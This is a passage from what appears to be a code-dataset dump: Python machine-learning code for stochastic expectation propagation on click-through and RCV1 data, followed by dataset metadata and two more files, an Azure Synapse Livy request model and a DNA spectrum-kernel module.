if ind[0].size>0:
v_l_inv_pos = ((n_pos[ind] - n_batch_pos[ind]) * (1.0/self.v_l_pos[ind]) + v_l_inv_batch_pos[ind])/n_pos[ind]
v_l_inv_mu_pos = ((n_pos[ind] - n_batch_pos[ind]) * (self.mu_l_pos[ind]/self.v_l_pos[ind]) + v_l_inv_mu_batch_pos[ind])/n_pos[ind]
self.v_l_pos[ind] = 1.0/v_l_inv_pos
self.mu_l_pos[ind] = self.v_l_pos[ind]*v_l_inv_mu_pos
accumulate_ind = list(set().union(accumulate_ind, list(ind[0])))
ind = np.nonzero(n_batch_neg)
if ind[0].size>0:
v_l_inv_neg = ((n_neg[ind] - n_batch_neg[ind]) * (1.0/self.v_l_neg[ind]) + v_l_inv_batch_neg[ind])/n_neg[ind]
v_l_inv_mu_neg= ((n_neg[ind] - n_batch_neg[ind]) * (self.mu_l_neg[ind]/self.v_l_neg[ind]) + v_l_inv_mu_batch_neg[ind])/n_neg[ind]
self.v_l_neg[ind] = 1.0/v_l_inv_neg
self.mu_l_neg[ind] = self.v_l_neg[ind]*v_l_inv_mu_neg
accumulate_ind = list(set().union(accumulate_ind, list(ind[0])))
v_inv_all = 1.0/self.v_p + n_pos*(1.0/self.v_l_pos) + n_neg*(1.0/self.v_l_neg)
v_inv_mu = self.mu_p/self.v_p + n_pos*(self.mu_l_pos/self.v_l_pos) + n_neg*(self.mu_l_neg/self.v_l_neg)
self.v = 1.0/v_inv_all
self.mu = self.v*v_inv_mu
#clear
count = 0
n_batch_pos = np.zeros(d)
n_batch_neg = np.zeros(d)
v_l_inv_batch_pos = np.zeros(d)
v_l_inv_batch_neg = np.zeros(d)
v_l_inv_mu_batch_pos = np.zeros(d)
v_l_inv_mu_batch_neg = np.zeros(d)
#we control how often we update the prior factors
if (curr/self.mini_batch) % n_batch_update_prior == 0:
#update prior factors
v_inv_not = 1/self.v[accumulate_ind] - 1/self.v_p[accumulate_ind]
v_not = 1/v_inv_not
mu_not = v_not * (self.mu[accumulate_ind]/self.v[accumulate_ind] - self.mu_p[accumulate_ind]/self.v_p[accumulate_ind])
v_tilt = 1/(1/v_not + 1/self.tau0)
mu_tilt = v_tilt * (mu_not/v_not)
#log N(0 | mu_not, v_not + tau0)
log_h = normal.logpdf(mu_not, scale = np.sqrt(v_not + self.tau0))
#log N(0 | mu_not, v_not)
log_g = normal.logpdf(mu_not, scale = np.sqrt(v_not))
rho_p = log_h - log_g
sel_prob = expit(self.rho + rho_p)
mu = sel_prob * mu_tilt
v = sel_prob * (v_tilt + (1.0 - sel_prob)*mu_tilt**2)
#damping
self.rho_p[accumulate_ind] = self.damping * rho_p + (1 - self.damping) * self.rho_p[accumulate_ind]
v_p_inv = 1/v - v_inv_not
v_p_inv[ v_p_inv <= 0] = 1/self.INF
v_p_inv_mu = mu/v - mu_not/v_not
v_p_inv = self.damping * v_p_inv + (1 - self.damping) * 1/self.v_p[accumulate_ind]
v_p_inv_mu = self.damping * v_p_inv_mu + (1 - self.damping) * self.mu_p[accumulate_ind]/self.v_p[accumulate_ind]
self.v_p[accumulate_ind] = 1/v_p_inv
self.mu_p[accumulate_ind] = self.v_p[accumulate_ind] * v_p_inv_mu
#update global approx. dist.
self.r[accumulate_ind] = self.rho_p[accumulate_ind] + self.rho
v_inv_all = v_inv_not + 1.0/self.v_p[accumulate_ind]
v_inv_mu = mu_not/v_not + self.mu_p[accumulate_ind]/self.v_p[accumulate_ind]
self.v[accumulate_ind] = 1.0/v_inv_all
self.mu[accumulate_ind] = self.v[accumulate_ind] * v_inv_mu
accumulate_ind = []
if (curr/self.mini_batch)%10 == 0:
diff = np.sum(np.abs((1/old_v - 1/self.v)) + np.sum(np.abs(old_mu - self.mu)) + np.sum(np.abs(old_r - self.r)))/(old_v.size + old_mu.size + old_r.size)
print >>logger, 'epoch %d, %d batches, diff = %g'%(it, curr/self.mini_batch, diff)
logger.flush()
print 'epoch %d, %d batches, diff = %g'%(it, curr/self.mini_batch, diff)
if diff < self.tol:
break
old_v = self.v.copy()
old_mu = self.mu.copy()
old_r = self.r.copy()
if (curr/self.mini_batch)%1000==0:
pred = self.predict(Xtest)
fpr,tpr,th = metrics.roc_curve(ytest, pred, pos_label=1)
val = metrics.auc(fpr,tpr)
print >>logger, 'auc = %g, feature # = %d'%(val, np.sum(self.r>0))
print 'auc = %g, feature # = %d'%(val, np.sum(self.r>0))
elapse = time.clock() - start_time
start_time = time.clock()
print '1000 batches, take %g seconds'%elapse
#evaluation
pred = self.predict(Xtest)
fpr,tpr,th = metrics.roc_curve(ytest, pred, pos_label=1)
val = metrics.auc(fpr,tpr)
print >>logger, 'epoch %d, tau0 = %g, auc = %g, feature # = %d'%(it, self.tau0, val, np.sum(self.r>0))
print 'epoch %d, tau0 = %g, auc = %g, feature # = %d'%(it, self.tau0, val, np.sum(self.r>0))
it = it + 1
curr = 0
def predict(self, Xtest):
d = self.mu.size
if d == Xtest.shape[1] + 1:
Xtest = np.hstack([Xtest, np.ones(Xtest.shape[0]).reshape([Xtest.shape[0],1])])
elif d != Xtest.shape[1]:
print 'inconsistent feature number'
return
#pred_prob = normal.cdf( np.dot(Xtest,self.mu) / np.sqrt( np.dot(Xtest**2, self.v) + 1 ) )
#pred_prob = np.dot(Xtest,self.mu)
#mu = self.mu * (expit(self.r)>0.5)
mu = self.mu * (expit(self.r)>0.5)
v = self.v * (expit(self.r)>0.5)
pred_prob = Xtest.dot(mu)
#pred_prob = np.dot(Xtest, mu)
#pred_prob = normal.cdf( np.dot(Xtest, mu) / np.sqrt( np.dot(Xtest**2, v) + 1 ) )
return pred_prob
#this version keeps average likelihood for pos. and neg. samples separately, and also use n_pos and n_neg to update the full posterior
#enforce the same step-size
#this reads data from HDFS and keeps read the negative samples until it reaches the same amount with the postive samples
#then pass once
#in theory, go 1000 pass can process all 7 days' data, 150 iteraions can process 1day's data
def train_stochastic_v6(self, X, y, n_pos, n_neg, Xtest, ytest, logger, n_batch_update_prior = 1, intercept = False, damping_both = True):
if intercept:
X = np.hstack([X, np.ones(X.shape[0]).reshape([X.shape[0],1])])
self.init_sep(X,y)
n,d = X.shape
#separate average likelihood for pos. & neg. samples
self.INF = 1e7
self.mu_p = np.zeros(d)
self.v_p = self.INF*np.ones(d)
self.mu_l_pos = np.zeros(d)
self.v_l_pos = self.INF * np.ones(d)
self.mu_l_neg = np.zeros(d)
self.v_l_neg = self.INF * np.ones(d)
self.v = 1.0/(1.0/self.v_p + n_pos*1.0/self.v_l_pos + n_neg*1.0/self.v_l_neg)
self.mu = np.zeros(d)
#calc. an uniform step-size
step_size = 10*float(self.mini_batch)/(n_pos + n_neg)
old_v = self.v.copy()
old_mu = self.mu.copy()
old_r = self.r.copy()
rows_shuf = range(n)
it = 0
count = 0
#for line in stdin:
#f = open('/tmp/ctr-train-4m','r')
with open('/tmp/ctr-train-36m.csv','r') as f:
for line in f:
#First read the same amount of negative samples
terms = line.strip().split(',')
if terms[-1] == "-1":
X[n_pos+count,:] = np.array([float(term) for term in terms[:-1]] + [1.0]) #adding intercept
count = count + 1
print count, n_pos
if count == n_pos:
data = np.hstack([X[:,:-1] , y.reshape(X.shape[0],1)])
#go though and online update
count = 0
curr = 0
np.random.shuffle( rows_shuf )
while curr < n:
#update average likelihood factor -- update batch samples
#ind = np.random.choice(n, self.mini_batch, replace=False)
ind = rows_shuf[curr:curr+self.mini_batch]
xbatch = X[ind,:]
xbatch2 = xbatch**2
ybatch = y[ind]
bsz = len(ind)
print np.sum(ybatch>0), np.sum(ybatch<0)
#cavity dist. q^{-1}, the same for each sample type
v_inv_not = np.zeros([bsz, d])
mu_inv_v_not = np.zeros([bsz, d])
v_inv_not[ybatch>0,:] = 1.0/self.v - 1.0/self.v_l_pos
v_inv_not[ybatch<0,:] = 1.0/self.v - 1.0/self.v_l_neg
mu_inv_v_not[ybatch>0,:] = self.mu/self.v - self.mu_l_pos/self.v_l_pos
mu_inv_v_not[ybatch<0,:] = self.mu/self.v - self.mu_l_neg/self.v_l_neg
v_not = 1.0/v_inv_not
mu_not = v_not * mu_inv_v_not
'''
v_inv_not = 1.0/self.v - 1.0/self.v_l
v_not = 1.0/v_inv_not
mu_not = v_not * (self.mu/self.v - self.mu_l/self.v_l)
mu_not = np.tile(mu_not, [len(ind), 1])
v_not = np.tile(v_not, [len(ind), 1])
'''
t1 = ybatch * np.sum(mu_not * xbatch, 1)
t2 = np.sqrt(np.sum(v_not*xbatch2 + 1.0, 1))
t3 = self.pdf_over_cdf(t1/t2)/t2
dmu_not = np.tile(vec(t3*ybatch), [1, d]) * xbatch
dv_not = np.tile(vec(-0.5*t3*t1/(t2*t2)), [1,d]) * xbatch2
mu = mu_not + v_not * dmu_not
v = v_not - v_not**2*(dmu_not**2 - 2*dv_not)
#obtain new batch likelihood approx.
v_l_inv = 1/v - 1/v_not
v_l_inv[ v_l_inv <= 0] = 1/self.INF
v_l_inv_mu = mu/v - mu_not/v_not
if damping_both:
prev = np.zeros([bsz, d])
prev[ybatch>0,:] = 1.0/self.v_l_pos
prev[ybatch<0,:] = 1.0/self.v_l_neg
v_l_inv = self.damping * v_l_inv + (1.0 - self.damping) * prev
prev[ybatch>0,:] = self.mu_l_pos/self.v_l_pos
prev[ybatch<0,:] = self.mu_l_neg/self.v_l_neg
v_l_inv_mu = self.damping * v_l_inv_mu + (1.0 - self.damping) * prev
v_l_inv_pos = step_size * np.mean(v_l_inv[ybatch>0,:], 0) + (1.0 - step_size) * 1.0/self.v_l_pos
v_l_inv_mu_pos = step_size * np.mean(v_l_inv_mu[ybatch>0,:],0) + (1.0 - step_size) * self.mu_l_pos/self.v_l_pos
self.v_l_pos = 1.0/v_l_inv_pos
self.mu_l_pos = self.v_l_pos * v_l_inv_mu_pos
v_l_inv_neg = step_size * np.mean(v_l_inv[ybatch<0,:], 0) + (1.0 - step_size) * 1.0/self.v_l_neg
v_l_inv_mu_neg = step_size * np.mean(v_l_inv_mu[ybatch<0,:],0) + (1.0 - step_size) * self.mu_l_neg/self.v_l_neg
self.v_l_neg = 1.0/v_l_inv_neg
self.mu_l_neg = self.v_l_neg * v_l_inv_mu_neg
v_inv_all = 1.0/self.v_p + n_pos*v_l_inv_pos + n_neg*v_l_inv_neg
self.v = 1.0/v_inv_all
self.mu = self.v*(self.mu_p/self.v_p + n_pos*v_l_inv_mu_pos + n_neg*v_l_inv_mu_neg)
curr = curr + self.mini_batch
#we control how often we update the prior factors
if (curr/self.mini_batch) % n_batch_update_prior == 0:
#update prior factors
v_inv_not = 1/self.v - 1/self.v_p
v_not = 1/v_inv_not
mu_not = v_not * (self.mu/self.v - self.mu_p/self.v_p)
v_tilt = 1/(1/v_not + 1/self.tau0)
mu_tilt = v_tilt * (mu_not/v_not)
#log N(0 | mu_not, v_not + tau0)
log_h = normal.logpdf(mu_not, scale = np.sqrt(v_not + self.tau0))
#log N(0 | mu_not, v_not)
log_g = normal.logpdf(mu_not, scale = np.sqrt(v_not))
rho_p = log_h - log_g
sel_prob = expit(self.rho + rho_p)
mu = sel_prob * mu_tilt
v = sel_prob * (v_tilt + (1.0 - sel_prob)*mu_tilt**2)
#damping
self.rho_p = self.damping * rho_p + (1 - self.damping) * self.rho_p
v_p_inv = 1/v - v_inv_not
v_p_inv[ v_p_inv <= 0] = 1/self.INF
v_p_inv_mu = mu/v - mu_not/v_not
v_p_inv = self.damping * v_p_inv + (1 - self.damping) * 1/self.v_p
v_p_inv_mu = self.damping * v_p_inv_mu + (1 - self.damping) * self.mu_p/self.v_p
self.v_p = 1/v_p_inv
self.mu_p = self.v_p * v_p_inv_mu
#update global approx. dist.
self.r = self.rho_p + self.rho
v_inv_all = v_inv_not + 1.0/self.v_p
v_inv_mu = mu_not/v_not + self.mu_p/self.v_p
self.v = 1.0/v_inv_all
self.mu = self.v * v_inv_mu
if (curr/self.mini_batch)%3 == 0:
diff = (np.sum(np.abs(1/old_v - 1/self.v)) + np.sum(np.abs(old_mu - self.mu)) + np.sum(np.abs(old_r - self.r)))/(old_v.size + old_mu.size + old_r.size)
print 'epoch %d, %d batches, diff = %g'%(it, curr/self.mini_batch, diff)
print >>logger, 'epoch %d, %d batches, diff = %g'%(it, curr/self.mini_batch, diff)
if diff < self.tol:
break
old_v = self.v.copy()
old_mu = self.mu.copy()
old_r = self.r.copy()
#evaluation
pred = self.predict(Xtest)
fpr,tpr,th = metrics.roc_curve(ytest, pred, pos_label=1)
val = metrics.auc(fpr,tpr)
print 'epoch %d, auc = %g, feature # = %d'%(it, val, np.sum(self.r>0))
print >>logger, 'epoch %d, auc = %g, feature # = %d'%(it, val, np.sum(self.r>0))
it = it + 1
if it >= self.n_epoch:
break
#SEP training
def train_stochastic(self, X, y, intercept = False):
if intercept:
X = np.hstack([X, np.ones(X.shape[0]).reshape([X.shape[0],1])])
self.init_sep(X,y)
n,d = X.shape
old_v = self.v.copy()
old_mu = self.mu.copy()
old_r = self.r.copy()
rows_shuf = range(n)
np.random.shuffle( rows_shuf )
it = 0
curr = 0
while it < self.n_epoch:
#update average likelihood factor -- update batch samples
ind = np.random.choice(n, self.mini_batch, replace=False)
#ind = rows_shuf[curr:curr+self.mini_batch]
xbatch = X[ind,:]
xbatch2 = xbatch**2
ybatch = y[ind]
#cavity dist. q^{-1}, the same for each batch-sample
v_inv_not = 1.0/self.v - 1.0/self.v_l
v_not = 1.0/v_inv_not
mu_not = v_not * (self.mu/self.v - self.mu_l/self.v_l)
mu_not = np.tile(mu_not, [self.mini_batch, 1])
v_not = np.tile(v_not, [self.mini_batch, 1])
t1 = ybatch * np.sum(mu_not * xbatch, 1)
t2 = np.sqrt(np.sum(v_not*xbatch2 + 1.0, 1))
t3 = self.pdf_over_cdf(t1/t2)/t2
dmu_not = np.tile(vec(t3*ybatch), [1, d]) * xbatch
dv_not = np.tile(vec(-0.5*t3*t1/(t2*t2)), [1,d]) * xbatch2
mu = mu_not + v_not * dmu_not
v = v_not - v_not**2*(dmu_not**2 - 2*dv_not)
#obtain new batch likelihood approx.
v_l_inv = 1/v - 1/v_not
v_l_inv[ v_l_inv <= 0] = 1/self.INF
v_l = 1.0/v_l_inv
v_l_inv = self.damping * 1.0/v_l + (1 - self.damping) * np.tile(1.0/self.v_l, [self.mini_batch, 1])
v_l_inv_mu = self.damping * (mu/v - mu_not/v_not) + (1 - self.damping) * np.tile(self.mu_l/self.v_l, [self.mini_batch, 1])
#stoastic update
v_inv_all = 1/self.v_p + (n - self.mini_batch) * 1.0/self.v_l + np.sum(v_l_inv, 0)
v_inv_mu = self.mu_p/self.v_p + (n - self.mini_batch) * self.mu_l/self.v_l + np.sum(v_l_inv_mu, 0)
self.v = 1/v_inv_all
self.mu = self.v * v_inv_mu
self.v_l = 1.0/((v_inv_all - 1/self.v_p)/n)
self.mu_l = self.v_l * ( (v_inv_mu - self.mu_p/self.v_p)/n )
#update prior factors
v_inv_not = 1/self.v - 1/self.v_p
v_not = 1/v_inv_not
mu_not = v_not * (self.mu/self.v - self.mu_p/self.v_p)
v_tilt = 1/(1/v_not + 1/self.tau0)
mu_tilt = v_tilt * (mu_not/v_not)
#log N(0 | mu_not, v_not + tau0)
log_h = normal.logpdf(mu_not, scale = np.sqrt(v_not + self.tau0))
#log N(0 | mu_not, v_not)
log_g = normal.logpdf(mu_not, scale = np.sqrt(v_not))
rho_p = log_h - log_g
sel_prob = expit(self.rho + rho_p)
mu = sel_prob * mu_tilt
v = sel_prob * (v_tilt + (1.0 - sel_prob)*mu_tilt**2)
#damping
self.rho_p = self.damping * rho_p + (1 - self.damping) * self.rho_p
v_p_inv = 1/v - v_inv_not
v_p_inv[ v_p_inv <= 0] = 1/self.INF
v_p_inv_mu = mu/v - mu_not/v_not
v_p_inv = self.damping * v_p_inv + (1 - self.damping) * 1/self.v_p
v_p_inv_mu = self.damping * v_p_inv_mu + (1 - self.damping) * self.mu_p/self.v_p
self.v_p = 1/v_p_inv
self.mu_p = self.v_p * v_p_inv_mu
#update global approx. dist.
self.r = self.rho_p + self.rho
v_inv_all = v_inv_not + 1.0/self.v_p
v_inv_mu = mu_not/v_not + self.mu_p/self.v_p
self.v = 1.0/v_inv_all
self.mu = self.v * v_inv_mu
curr = curr + self.mini_batch
if curr%10 == 0:
diff = np.sqrt(np.sum((1/old_v - 1/self.v)**2) + np.sum((old_mu - self.mu)**2) + np.sum((old_r - self.r)**2))/(old_v.size + old_mu.size + old_r.size)
print 'epoch %d, %d batches, diff = %g'%(it, curr/self.mini_batch, diff)
if diff < self.tol:
break
old_v = self.v.copy()
old_mu = self.mu.copy()
old_r = self.r.copy()
if curr >= n:
it = it + 1
curr = 0
def test_ctr_large_sep_weighted():
training_file = '/tmp/large-ctr-pxu-train'
testing_file = '/tmp/large-ctr-pxu-test'
fea2id = load_feature_id('feature_to_id.txt')
fea2stats = load_feature_stats('mean_std_continuous_features.txt')
'''
Xtest,ytest = load_test_data('/tmp/large-ctr-pxu-test', fea2id, fea2stats)
save_sparse_csr('/tmp/large-ctr-pxu-test-X', Xtest)
np.save('/tmp/large-ctr-pxu-test-y', ytest)
sys.exit(1)
'''
Xtest = load_sparse_csr('/tmp/large-ctr-pxu-test-X.npz')
ytest = np.load('/tmp/large-ctr-pxu-test-y.npy')
d = 204327
#calc_feature_appearence_separately(d, fea2id, training_file)
n_pos = np.load('feature_appearence_pos.npy')
n_neg = np.load('feature_appearence_neg.npy')
ep = EPSS(d, rho0 = 0.0000001, n_epoch = 1, mini_batch = 100, tol = 1e-5, damping = 0.9, tau0 = 1.0)
with open('logger-2.txt','w') as f:
ep.train_stochastic_v4(d, n_pos, n_neg, training_file, fea2id, fea2stats, Xtest, ytest, f, n_batch_update_prior = 1, damping_both = True)
w = ep.mu * (expit(ep.r)>0.5)
np.save('model-w-8.npy', w)
r = ep.r
np.save('sel-w-8.npy', r)
def test_ctr_large_sep():
training_file = '/tmp/large-ctr-pxu-train'
testing_file = '/tmp/large-ctr-pxu-test'
fea2id = load_feature_id('feature_to_id.txt')
fea2stats = load_feature_stats('mean_std_continuous_features.txt')
'''
Xtest,ytest = load_test_data('/tmp/large-ctr-pxu-test', fea2id, fea2stats)
save_sparse_csr('/tmp/large-ctr-pxu-test-X', Xtest)
np.save('/tmp/large-ctr-pxu-test-y', ytest)
sys.exit(1)
'''
Xtest = load_sparse_csr('/tmp/large-ctr-pxu-test-X.npz')
ytest = np.load('/tmp/large-ctr-pxu-test-y.npy')
d = 204327
ep = EPSS(d, rho0 = 0.5, n_epoch = 10, mini_batch = 100, tol = 1e-5, damping = 0.9, tau0 = 1.0)
with open('logger.txt','w') as f:
ep.train_stochastic_v3(d, training_file, fea2id, fea2stats, Xtest, ytest, f, n_batch_update_prior = 1, damping_both = True)
w = ep.mu * (expit(ep.r)>0.5)
np.save('model-2.npy', w)
r = ep.r
np.save('sel-2.npy', r)
def load_feature_id(file_path):
res = {}
with open(file_path, 'r') as f:
for line in f:
name,id = line.strip().split('\t')
res[ name ] = int(id)
return res
def load_feature_stats(file_path):
res = {}
with open(file_path, 'r') as f:
for line in f:
name,mean,std= line.strip().split('\t')
#res[ name ] = [float(mean), float(std)]
#very hacking way -- zsd, to disable normalization
res[ name ] = [0.0, 1.0]
return res
def load_test_data(file_path, fea2id, fea2stats):
y = []
row_ind = []
col_ind = []
data = []
row_num = 0
with open(file_path, 'r') as f:
for line in f:
items = line.strip().split(' ')
y.append(int(items[0]))
for item in items[2:]:
key_val = item.split(':')
if key_val[0] not in fea2id:
continue
id = fea2id[ key_val[0] ]
if len(key_val) == 1:
data.append(1.0)
else:
data.append(float(key_val[1]))
#data.append( normalize(float(key_val[1]), fea2stats[key_val[0]]) )
row_ind.append(row_num)
col_ind.append(id)
#append intercept
data.append(1.0)
row_ind.append(row_num)
col_ind.append(len(fea2id))
row_num = row_num + 1
if row_num%10000 == 0:
print row_num
Xtest = csr_matrix((data, (row_ind, col_ind)))
y = np.array(y)
return [Xtest,y]
def save_sparse_csr(filename, array):
np.savez(filename,data = array.data ,indices=array.indices, indptr =array.indptr, shape=array.shape)
def load_sparse_csr(filename):
loader = np.load(filename)
return csr_matrix((loader['data'], loader['indices'], loader['indptr']), shape = loader['shape'])
#calculate the appearche of each features in the training data, for postive and negative samples
def calc_feature_appearence_separately(d, fea2id, training_file):
#including intercept
#pos
res = np.zeros(d+1)
#neg
res2 = np.zeros(d+1)
with open(training_file, 'r') as f:
ct = 0
for line in f:
ct = ct + 1
items = line.strip().split(' ')
label = int(items[0])
if label == 1:
res[d] = res[d] + 1
else:
res2[d] = res2[d] + 1
for item in items[3:]:
name = item.split(':')[0]
id = fea2id[name]
if label == 1:
res[ id ] = res[ id ] + 1
else:
res2[ id ] = res2[ id ] + 1
if ct%10000 == 0:
print ct
np.save('feature_appearence_pos.npy',res)
np.save('feature_appearence_neg.npy',res2)
def tune_rcv1(tau0):
training_file = '../../../data/rcv1/rcv1.train.vw.subtrain'
testing_file = '../../../data/rcv1/rcv1.train.vw.validation'
fea2id = load_feature_id('feature_to_id.txt')
#zsd, note i used a very hacking way to disable the normalization effect
fea2stats = load_feature_stats('mean_std_continuous_features.txt')
'''
Xtest,ytest = load_test_data(testing_file, fea2id, fea2stats)
save_sparse_csr('./rcv1.validate-X', Xtest)
np.save('./rcv1.validate-y', ytest)
sys.exit(1)
'''
Xtest = load_sparse_csr('./rcv1.validate-X.npz')
ytest = np.load('./rcv1.validate-y.npy')
d = len(fea2id)
#calc_feature_appearence_separately(d, fea2id, training_file)
n_pos = np.load('feature_appearence_pos.npy')
n_neg = np.load('feature_appearence_neg.npy')
ep = EPSS(d, rho0 = 0.5, n_epoch = 1, mini_batch = 100, tol = 1e-5, damping = 0.9, tau0 = tau0)
with open('logger-rcv1-tune.txt','a+') as f:
ep.train_stochastic_multi_rate(d, n_pos, n_neg, training_file, fea2id, fea2stats, Xtest, ytest, f, n_batch_update_prior = 1, damping_both = True)
if __name__ == '__main__':
if len(sys.argv) != 2:
print 'usage %s <tau0>'%sys.argv[0]
sys.exit(1)
np.random.seed(0)
tune_rcv1(float(sys.argv[1]))
| 38,049 | -10 | 510 |
e024297cf1e1ea4f32ebd218843757ebd132b2de | 2,776 | py | Python | src/synapse/azext_synapse/vendored_sdks/azure_synapse/models/livy_request_base.py | Mannan2812/azure-cli-extensions | e2b34efe23795f6db9c59100534a40f0813c3d95 | [
"MIT"
] | 2 | 2021-03-24T21:06:20.000Z | 2021-03-24T21:07:58.000Z | src/synapse/azext_synapse/vendored_sdks/azure_synapse/models/livy_request_base.py | Mannan2812/azure-cli-extensions | e2b34efe23795f6db9c59100534a40f0813c3d95 | [
"MIT"
] | 3 | 2020-05-27T20:16:26.000Z | 2020-07-23T19:46:49.000Z | src/synapse/azext_synapse/vendored_sdks/azure_synapse/models/livy_request_base.py | Mannan2812/azure-cli-extensions | e2b34efe23795f6db9c59100534a40f0813c3d95 | [
"MIT"
] | 5 | 2020-05-09T17:47:09.000Z | 2020-10-01T19:52:06.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class LivyRequestBase(Model):
"""LivyRequestBase.
:param name:
:type name: str
:param file:
:type file: str
:param class_name:
:type class_name: str
:param args:
:type args: list[str]
:param jars:
:type jars: list[str]
:param files:
:type files: list[str]
:param archives:
:type archives: list[str]
:param conf:
:type conf: dict[str, str]
:param driver_memory:
:type driver_memory: str
:param driver_cores:
:type driver_cores: int
:param executor_memory:
:type executor_memory: str
:param executor_cores:
:type executor_cores: int
:param num_executors:
:type num_executors: int
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'file': {'key': 'file', 'type': 'str'},
'class_name': {'key': 'className', 'type': 'str'},
'args': {'key': 'args', 'type': '[str]'},
'jars': {'key': 'jars', 'type': '[str]'},
'files': {'key': 'files', 'type': '[str]'},
'archives': {'key': 'archives', 'type': '[str]'},
'conf': {'key': 'conf', 'type': '{str}'},
'driver_memory': {'key': 'driverMemory', 'type': 'str'},
'driver_cores': {'key': 'driverCores', 'type': 'int'},
'executor_memory': {'key': 'executorMemory', 'type': 'str'},
'executor_cores': {'key': 'executorCores', 'type': 'int'},
'num_executors': {'key': 'numExecutors', 'type': 'int'},
}
| 36.051948 | 76 | 0.568084 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class LivyRequestBase(Model):
"""LivyRequestBase.
:param name:
:type name: str
:param file:
:type file: str
:param class_name:
:type class_name: str
:param args:
:type args: list[str]
:param jars:
:type jars: list[str]
:param files:
:type files: list[str]
:param archives:
:type archives: list[str]
:param conf:
:type conf: dict[str, str]
:param driver_memory:
:type driver_memory: str
:param driver_cores:
:type driver_cores: int
:param executor_memory:
:type executor_memory: str
:param executor_cores:
:type executor_cores: int
:param num_executors:
:type num_executors: int
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'file': {'key': 'file', 'type': 'str'},
'class_name': {'key': 'className', 'type': 'str'},
'args': {'key': 'args', 'type': '[str]'},
'jars': {'key': 'jars', 'type': '[str]'},
'files': {'key': 'files', 'type': '[str]'},
'archives': {'key': 'archives', 'type': '[str]'},
'conf': {'key': 'conf', 'type': '{str}'},
'driver_memory': {'key': 'driverMemory', 'type': 'str'},
'driver_cores': {'key': 'driverCores', 'type': 'int'},
'executor_memory': {'key': 'executorMemory', 'type': 'str'},
'executor_cores': {'key': 'executorCores', 'type': 'int'},
'num_executors': {'key': 'numExecutors', 'type': 'int'},
}
def __init__(self, **kwargs):
super(LivyRequestBase, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.file = kwargs.get('file', None)
self.class_name = kwargs.get('class_name', None)
self.args = kwargs.get('args', None)
self.jars = kwargs.get('jars', None)
self.files = kwargs.get('files', None)
self.archives = kwargs.get('archives', None)
self.conf = kwargs.get('conf', None)
self.driver_memory = kwargs.get('driver_memory', None)
self.driver_cores = kwargs.get('driver_cores', None)
self.executor_memory = kwargs.get('executor_memory', None)
self.executor_cores = kwargs.get('executor_cores', None)
self.num_executors = kwargs.get('num_executors', None)
| 765 | 0 | 27 |
318dbd4cf83ca98be58a194a8c38e90476d92a30 | 2,498 | py | Python | kernel/spectrum.py | glothe/dna-prediction | e5aa45b1e552c7d22f2782928e9cbac1cfdd2222 | [
"MIT"
] | null | null | null | kernel/spectrum.py | glothe/dna-prediction | e5aa45b1e552c7d22f2782928e9cbac1cfdd2222 | [
"MIT"
] | null | null | null | kernel/spectrum.py | glothe/dna-prediction | e5aa45b1e552c7d22f2782928e9cbac1cfdd2222 | [
"MIT"
] | null | null | null | import functools
from collections import Counter
import numpy as np
from numba import njit
from numba.typed import Dict
from tqdm import tqdm
from kernel.utils import memoize_id, normalize_kernel
TRANSLATION = {
"A": "T",
"T": "A",
"C": "G",
"G": "C"
}
@functools.lru_cache(None)
def complement(x: str):
"""Taking into account that the complement of a k-mer is supposed to be counted as the k-mer itself
projects upon the space of k-mers beginning either by 'A' or 'C'
e.g: ATAGCC == TATCGG
complement("ATAGCC")="ATAGCC"
complement("TATCGG")="ATAGCC"
"""
if x[0] in "AC":
return x
return x.translate(TRANSLATION)
@memoize_id
@functools.lru_cache(None) | 27.152174 | 103 | 0.548038 | import functools
from collections import Counter
import numpy as np
from numba import njit
from numba.typed import Dict
from tqdm import tqdm
from kernel.utils import memoize_id, normalize_kernel
TRANSLATION = {
"A": "T",
"T": "A",
"C": "G",
"G": "C"
}
@functools.lru_cache(None)
def complement(x: str):
"""Taking into account that the complement of a k-mer is supposed to be counted as the k-mer itself
projects upon the space of k-mers beginning either by 'A' or 'C'
e.g: ATAGCC == TATCGG
complement("ATAGCC")="ATAGCC"
complement("TATCGG")="ATAGCC"
"""
if x[0] in "AC":
return x
return x.translate(TRANSLATION)
@memoize_id
def feature_vectors(X: np.ndarray, k: int):
n = len(X)
X_dict = [None] * n
for i, x in enumerate(X):
X_dict[i] = Counter(complement(x[c:c + k]) for c in range(len(x) - k + 1))
return X_dict
@functools.lru_cache(None)
def spectrum_kernel(k: int = 4):
@memoize_id
def spectrum_kernel_inner(X0: np.ndarray, X1: np.ndarray):
symmetric = X0 is X1
n0 = len(X0)
X0_dict = feature_vectors(X0, k)
if symmetric:
K = np.zeros(shape=(n0, n0))
# Compute sparse dot product
for i in tqdm(range(n0), desc=f"Spectrum kernel (k={k})"):
X0i = X0_dict[i]
for j in range(i, n0):
X0j = X0_dict[j]
K[i, j] = sum(count * X0j[substr] for substr, count in X0i.items())
K[j, i] = K[i, j]
return normalize_kernel(K)
else:
n1 = len(X1)
X1_dict = feature_vectors(X1, k)
K = np.zeros(shape=(n0, n1))
# Compute sparse dot product
for i in tqdm(range(n0), desc=f"Spectrum kernel (k={k})"):
X0i = X0_dict[i]
for j in range(n1):
X1j = X1_dict[j]
K[i, j] = sum(count * X1j[substr] for substr, count in X0i.items())
# Computes K(x, x) and K(y, y) for normalization
rows = np.zeros(shape=n0)
for i in range(n0):
rows[i] = sum(count ** 2 for count in X0_dict[i].values())
columns = np.zeros(shape=n1)
for j in range(n1):
columns[j] = sum(count ** 2 for count in X1_dict[j].values())
return normalize_kernel(K, rows=rows, columns=columns)
return spectrum_kernel_inner | 1,731 | 0 | 44 |
